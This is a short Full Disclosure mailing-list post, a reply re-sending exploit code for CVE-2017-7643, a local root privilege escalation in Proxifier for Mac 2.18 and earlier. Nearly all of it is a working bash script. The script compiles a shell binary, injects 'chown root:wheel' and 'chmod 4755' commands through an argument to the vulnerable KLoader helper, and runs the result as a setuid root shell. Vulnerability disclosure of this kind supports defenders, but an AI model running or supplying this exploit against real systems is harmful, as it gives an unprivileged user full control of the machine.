Re: [FD] CVE-2017-7643 Local root privesc in Proxifier for Mac <= 2.18

Mark Wadham Wed, 12 Apr 2017 14:23:30 -0700

Sorry, the exploit code got mangled :S

-------------------------
#!/bin/bash


#####################################################################
# Local root exploit for vulnerable KLoader binary distributed with #
# Proxifier for Mac v2.18                                           #
#####################################################################
# by m4rkw                                                          #
#####################################################################

cat > a.c <<EOF
#include <stdio.h>
#include <unistd.h>

int main()
{
  setuid(0);
  seteuid(0);

  execl("/bin/bash", "bash", NULL);
  return 0;
}
EOF

gcc -o /tmp/a a.c
rm -f a.c

/Applications/Proxifier.app/Contents/KLoader 'blah; chown root:wheel/tmp/a ; chmod 4755 /tmp/a'

/tmp/a
-------------------------

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Re: [FD] CVE-2017-7643 Local root privesc in Proxifier for Mac <= 2.18

Reply via email to